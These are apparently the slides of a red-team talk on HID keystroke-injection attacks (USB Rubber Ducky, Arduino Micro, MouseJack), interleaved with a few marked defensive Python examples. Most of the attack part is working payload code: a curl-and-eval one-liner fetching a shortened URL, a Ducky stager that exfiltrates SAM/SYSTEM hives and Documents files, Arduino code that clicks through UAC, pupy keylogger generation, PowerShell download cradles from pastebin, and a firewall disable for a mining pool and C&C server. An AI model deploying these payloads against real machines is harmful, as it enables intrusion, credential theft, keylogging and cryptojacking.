Red Team Practical Attacks
S01E01
HID attacks - SE techniques
Giacomo Pezzi
Edoardo Rosa
In military jargon, the term Red Team is traditionally used to identify highly skilled and organized groups acting as fictitious rivals and/or enemies to the “regular” forces, the Blue Team.
Historically, a red team was a group of military personnel playing the role of adversaries, the enemy or opposing force (“RED”), as opposed to the friendly forces team (“BLUE”). With time, the red teams' mission and capabilities evolved and they turned into a force tasked with challenging the security posture of military bases, outposts and other “targets”.
Corporations in general and high-tech companies in particular sought a way to test their security posture and see whether they were vulnerable to attacks they had not accounted for or planned for. The early civilian red teams were mostly information/computer security professionals mixed with physical security experts, mainly focused on what was possible with the technology of the day.
Today both government and private organizations use Red Teams not only to test the current state of their physical and digital security but also to continuously challenge the plans, defensive measures and security concepts/policies.
These exercises result in a better understanding of possible adversaries and help to improve countermeasures against them and against future threats.
They help the organization improve its own defensive abilities -> interaction and mutual feedback.
...on both sides, human intuition, expertise and cleverness cannot be replaced! So:
If you know the enemy and know yourself, you need not fear the result of a hundred battles.
Sun Tzu: The Art of War
You can have the best firewalls and change control procedures; you can have regular electronic penetration testing against networks and applications; you can audit your source code and lock down your servers. All of these approaches are fine and, if conducted well, are generally worthwhile. However, if an attacker can physically penetrate your premises and access information systems directly, these strategies won’t protect you.
Technologies that are commonly deployed to keep intruders out:
Technologies that are commonly used by an attacker or physical pentester:
The art of unlocking a lock by manipulating the components of the lock device without the original key.
only tricks!
Radio-frequency identification uses electromagnetic fields to automatically identify and track tags attached to objects.
Main frequencies:
- 125 kHz
- 13 MHz
4,50 € - read 125 kHz
6,50 € - read 13 MHz
12 € - clone 125 kHz
A human interface device (HID) is a type of computer device used directly by humans: it takes input from them and gives output to them.
The term "HID" most commonly refers to the USB-HID specification.
Most of the time, HIDs don't need external drivers to operate.
Not within the scope of antivirus software.
An HID attack can lead to payload delivery or data exfiltration simply by using a pre-programmed USB stick that acts as an HID device, for example a specialized tool to SPOOF keyboard input.
By default, operating systems tend to allow keyboards and mice full control of the system. Using timed commands, it is easy to run a complete drive-by HID attack in 20 seconds, possibly even less. It also avoids detection in some ways, as you are ‘physically pressing the keys’ – or at least, that's what the computer thinks.
Most antivirus software will not protect you against this kind of attack.
From the OS's point of view, the user is typing on his keyboard!!
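Because the OS trusts any keyboard, one practical detection signal is timing: an injected payload arrives far faster and far more regularly than a human types. The following Python is an added example (not from the talk) that scores timestamped key-down events per keyboard device; the thresholds and the sample events are constructed assumptions.

```python
from __future__ import annotations
from dataclasses import dataclass
from statistics import mean, pstdev

# Assumed thresholds (not from the talk): a fast human rarely sustains less
# than 50 ms between keys across 20 keystrokes, and human timing is noisy,
# whereas an injector types at a fixed, almost jitter-free cadence.
MIN_HUMAN_INTERVAL_MS = 50.0
MAX_MACHINE_JITTER_MS = 3.0
WINDOW = 20  # consecutive keystrokes examined at a time

@dataclass
class KeyEvent:
    ts_ms: float   # key-down timestamp in milliseconds
    device: str    # identifier of the keyboard that produced it

def suspicious_devices(events: list[KeyEvent]) -> list[tuple[str, float, float]]:
    """Return (device, mean_gap_ms, jitter_ms) for each device that, in some
    window of WINDOW keystrokes, typed faster than a human or with
    machine-like regularity; at most one entry per device."""
    by_device: dict[str, list[float]] = {}
    for ev in events:
        by_device.setdefault(ev.device, []).append(ev.ts_ms)
    hits = []
    for device, stamps in by_device.items():
        stamps.sort()
        for i in range(len(stamps) - WINDOW + 1):
            win = stamps[i:i + WINDOW]
            gaps = [b - a for a, b in zip(win, win[1:])]
            avg, jitter = mean(gaps), pstdev(gaps)
            if avg < MIN_HUMAN_INTERVAL_MS or jitter < MAX_MACHINE_JITTER_MS:
                hits.append((device, avg, jitter))
                break
    return hits

def constructed_events() -> list[KeyEvent]:
    """Constructed sample: a human typing with natural jitter on usb-kbd-1,
    then an injector typing 40 characters at a fixed 7 ms cadence on usb-kbd-2."""
    human = [0, 130, 210, 380, 455, 640, 700, 905, 990, 1150, 1260, 1500,
             1580, 1720, 1810, 2000, 2130, 2200, 2400, 2510, 2650, 2770]
    injected = [5000 + 7 * i for i in range(40)]
    return ([KeyEvent(float(t), "usb-kbd-1") for t in human] +
            [KeyEvent(float(t), "usb-kbd-2") for t in injected])

if __name__ == "__main__":
    for device, avg, jitter in suspicious_devices(constructed_events()):
        print(f"{device}: mean gap {avg:.1f} ms, jitter {jitter:.1f} ms")
```

A scripted DELAY between stages does not hide the burst: the windows inside a single STRING line still trip the check.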
Vulnerabilities affecting non-Bluetooth wireless mice and keyboards, discovered by Marc Newlin of the Bastille Threat Research Team.
https://www.bastille.net/
https://www.mousejack.com/
These vulnerabilities enable an attacker to type arbitrary commands into a victim's machine using a USB dongle.
Wireless mice and keyboards communicate using proprietary protocols operating in the 2.4 GHz ISM band (Industrial, Scientific, Medical):
there is no standard to follow;
each vendor can implement its own security scheme.
Researchers discovered that some dongles don't implement encryption at all, or implement it imperfectly, and that they also process specially crafted packets that generate key presses instead of mouse movements/clicks.
- keystroke injection, spoofing a mouse
- keystroke injection, spoofing a keyboard
- forced pair
Crazyradio PA by Bitcraze is an open-source, amplified nRF24L-based USB dongle: the equivalent of an amplified version of the common USB dongle for mice and keyboards.
- pseudo-promiscuous mode
- packet sniffing
- packet injection
- easy interface
30 € on Amazon...
- choose a victim with a possibly unpatched/vulnerable device
- gather information about OS, keybindings, installed tools, etc.
Thanks GitHub... <3
- write the exploit
```text
DELAY 1000
GUI-SHIFT ENTER
DELAY 600
STRING (x=$(\curl -sL https://bit.ly/2yOCGw8);eval $x)&;disown %1;exit
ENTER
```
The USB Rubber Ducky is a keystroke injection tool disguised as a generic flash drive. When it is plugged into a computer, it instead registers itself as a USB keyboard on the system and fires off a keystroke payload at lightning speed.
Payloads are crafted using a simple scripting language and can be used to drop reverse shells, inject binaries, brute force pin codes, and many other automated functions for the penetration tester and systems administrator. Writing scripts can be done from any common text editor.
| Command | Parameters |
|---|---|
| REM | - |
| DELAY | 0 and up (milliseconds) |
| STRING | a...z A...Z 0...9 !...) `~ += _- "' :; <, >. ?/ \ and pipe |
| REPEAT | (n) number of times to repeat |
| (*)ARROW | left, right, up or down arrow (LEFTARROW, RIGHTARROW, UPARROW, DOWNARROW) |

| Command | Optional Parameters |
|---|---|
| GUI | Single char |
| SHIFT | DELETE, HOME, INSERT, PAGEUP, PAGEDOWN, WINDOWS, GUI, UPARROW, DOWNARROW, LEFTARROW, RIGHTARROW, TAB |
| ALT | END, ESC, ESCAPE, F1...F12, Single Char, SPACE, TAB |
| CTRL | BREAK, PAUSE, F1...F12, ESCAPE, ESC, Single Char |
See more on: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript
Ducky Scripts are compiled into hex files, named inject.bin and moved to the root of a microSD card for execution by the USB Rubber Ducky. This is done with the duckencoder tool.
Best experience: https://github.com/kevthehermit/DuckToolkit
Best automation: https://ducktoolkit.com/
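As an added example (not part of the talk or of the Hak5 tooling), the following Python triages a Duckyscript source against the command table above: it totals the scripted DELAYs, counts injected keystrokes, pulls out any URLs the STRING lines would type and flags unknown commands, so an analyst can estimate how long a recovered payload runs. The 10 ms per keystroke rate and the SAMPLE script are constructed assumptions.

```python
import re
from dataclasses import dataclass, field
# Key commands from the Duckyscript table (combos such as GUI-SHIFT match on
# their first token); one such command costs one HID report.
KEY_CMDS = {"ENTER", "TAB", "SPACE", "ESC", "ESCAPE", "DELETE", "HOME", "INSERT",
            "PAGEUP", "PAGEDOWN", "END", "BREAK", "PAUSE", "CAPSLOCK", "WINDOWS",
            "GUI", "SHIFT", "ALT", "CTRL", "CONTROL", "UPARROW", "DOWNARROW",
            "LEFTARROW", "RIGHTARROW"} | {f"F{i}" for i in range(1, 13)}
KEY_MS = 10  # assumed cost of one injected keystroke, in milliseconds

@dataclass
class Triage:
    delay_ms: int = 0
    keystrokes: int = 0
    urls: list = field(default_factory=list)     # URLs typed by STRING lines
    unknown: list = field(default_factory=list)  # commands not in the table
    def nominal_ms(self) -> int:  # estimated run time: delays plus typing
        return self.delay_ms + self.keystrokes * KEY_MS

def apply(t: Triage, cmd: str, arg: str) -> None:
    if cmd == "DELAY":
        t.delay_ms += int(arg) if arg.isdigit() else 0
    elif cmd == "STRING":
        t.keystrokes += len(arg)
        t.urls += re.findall(r"https?://\S+", arg)
    elif cmd.split("-")[0] in KEY_CMDS:
        t.keystrokes += 1
    elif cmd != "REM":
        t.unknown.append(cmd)

def triage(script: str) -> Triage:
    t, prev = Triage(), ("REM", "")
    for line in filter(None, map(str.strip, script.splitlines())):
        cmd, _, arg = line.partition(" ")
        if cmd == "REPEAT":  # re-run the previous command n times
            for _ in range(int(arg) if arg.isdigit() else 1):
                apply(t, *prev)
            continue
        apply(t, cmd, arg)
        prev = (cmd, arg)
    return t

SAMPLE = """REM constructed sample in the style of the talk, not a real payload
DELAY 1000
GUI r
DELAY 600
STRING powershell -w h -c "iwr https://example.invalid/s.ps1 | iex"
ENTER
REPEAT 3
BOGUS 1"""
```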
USB Rubber Ducky on Windows 10 64-bit. Exfiltration & information gathering:
```text
DELAY 4000
GUI r
DELAY 100
STRING powershell -command "Start-Process powershell -Verb runAs -ArgumentList '-w h -c .(((Get-Volume -FileSystemLabel DUCKY).DriveLetter)+'':\d.cmd'') ' "
DELAY 100
ENTER
DELAY 1100
LEFTARROW
DELAY 50
ENTER
```
Multi-stage payload -> CAPSLOCK blinks at every stage:
```powershell
"$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
```
Hidden execution:
d.cmd (launched by the injected keystrokes) invisibly executes e.cmd through i.vbs.
Multi-feature stager:
e.cmd (launched by d.cmd) executes p.ps1 -> reporting + SAM/SYSTEM exfiltration,
and then attempts some pure data exfiltration -> stealing files placed in %USERPROFILE%\Documents until the Ducky is unplugged by the attacker.
Believability built in:
Looks like a generic flash drive -> TwinDuck firmware.
Emulation of the most common USB flash drive chipsets: Alcor Micro Corp. (0x058F) generic 'Flash Drive' (0x6387) -> vidpid.bin on the microSD root, optionally hidden.
Choose a story for your drive -> NO LIMITS!!!
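A defensive counterpart to the TwinDuck trick, added here as an example (not from the talk): enforce a device policy in the spirit of USBGuard's interface rules, so that a "flash drive" which also enumerates a HID interface is rejected and any HID device not on an allowlist is blocked, whatever VID/PID it claims. The allowlist, device records and class-code constants below are constructed; only Alcor Micro's 0x058F/0x6387 comes from the talk.

```python
from dataclasses import dataclass

HID = "03"           # bInterfaceClass shared by keyboards, mice and generic HID
MASS_STORAGE = "08"  # bInterfaceClass of a flash drive's storage interface

# Assumed corporate allowlist of HID devices as VID:PID (constructed values).
HID_ALLOWLIST = {"1234:5678", "abcd:ef01"}

@dataclass
class UsbDevice:
    vid: str
    pid: str
    name: str
    interfaces: list  # "class:subclass:protocol" hex triples, one per interface

    def has_class(self, cls: str) -> bool:
        return any(i.split(":")[0].lower() == cls for i in self.interfaces)

def classify(dev: UsbDevice) -> str:
    """Return 'reject', 'block' or 'allow' (USBGuard's verdict vocabulary)."""
    # Storage plus HID on one device is exactly the TwinDuck shape: the VID/PID
    # of a real flash drive chipset, plus a keyboard nobody asked for.
    if dev.has_class(MASS_STORAGE) and dev.has_class(HID):
        return "reject"
    # Any HID interface can inject keystrokes (a "mouse" dongle included, as
    # MouseJack showed), so it must be explicitly allowlisted; a spoofed
    # VID/PID only helps the attacker if it happens to be on the list.
    if dev.has_class(HID) and f"{dev.vid}:{dev.pid}".lower() not in HID_ALLOWLIST:
        return "block"
    return "allow"

def audit(devices: list) -> dict:
    """Map each device name to its verdict."""
    return {d.name: classify(d) for d in devices}

# Constructed sample enumeration. Interface triples use the USB class codes:
# 08:06:50 = mass storage / SCSI / bulk-only, 03:01:01 = HID / boot / keyboard.
SAMPLE_DEVICES = [
    UsbDevice("058f", "6387", "plain flash drive", ["08:06:50"]),
    UsbDevice("058f", "6387", "twinduck lookalike", ["08:06:50", "03:01:01"]),
    UsbDevice("1234", "5678", "corporate keyboard", ["03:01:01"]),
    UsbDevice("9999", "0001", "unknown keyboard", ["03:01:01"]),
]

if __name__ == "__main__":
    for name, verdict in audit(SAMPLE_DEVICES).items():
        print(f"{verdict:6} {name}")
```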
The Arduino Micro is a small board that is easy to integrate into everyday objects to make them interactive.
The Micro is based on the ATmega32U4 microcontroller, which features built-in USB and lets the Micro be recognised as a mouse or keyboard.
```cpp
#include "Keyboard.h"

void setup() {
  Keyboard.begin();
  delay(6000);
  run_powershell_admin();
  payload(String("ciao"));
  Keyboard.end();
}

void run_powershell_admin() {
  // Win key opens the Start menu search, then the program name is typed
  Keyboard.press(KEY_LEFT_GUI);
  delay(300);
  Keyboard.releaseAll();
  Keyboard.println("notepad");
  delay(500);
  // Ctrl+Shift+Enter launches the highlighted result as Administrator
  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press(KEY_LEFT_SHIFT);
  Keyboard.press(KEY_RETURN);
  Keyboard.releaseAll();
  delay(800);
  bypass_uac();
}

void bypass_uac() {
  // answer the UAC prompt (Left Arrow, then Enter)
  Keyboard.press(KEY_LEFT_ARROW);
  Keyboard.release(KEY_LEFT_ARROW);
  delay(500);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
  delay(800);
}

void payload(String str) {
  Keyboard.println(str);
  delay(400);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
}

void loop() { }
```
Arduino is only able to inject keystrokes: no drive storage!!!!
Download the payload from a known and controlled source: pastebin.com
Disable the firewall to access the XMR pool and C&C server
How to start the download?
Run as Administrator
https://github.com/n1nj4sec/pupy
Set up the server:
```shell
./pupysh.py -p 4444 -t http
```
Generate the client payload:
```shell
./pupygen.py -s keylogger -f ps1 -O windows connect --host 192.168.1.111:4444 -t http
```
Upload to pastebin:
https://pastebin.com/YaUXbj3W
Use inside the main script:
```powershell
IEX ((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/YaUXbj3W'))
```
```cpp
String hejo = String("powershell -NoP -NonI -W Hidden -Exec Bypass \"IEX ((New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/KRQFLR83'));\";exit");
```
PowerShell payload:
Run a PowerShell console as Administrator:
```cpp
void run_powershell_admin() {
  // Win+x
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press(char(120));  // 'x'
  delay(300);
  Keyboard.releaseAll();
  // a
  Keyboard.press(char(97));
  Keyboard.releaseAll();
  delay(800);
  bypass_uac();
}
```
Execution time: 11 s
Specs
The Target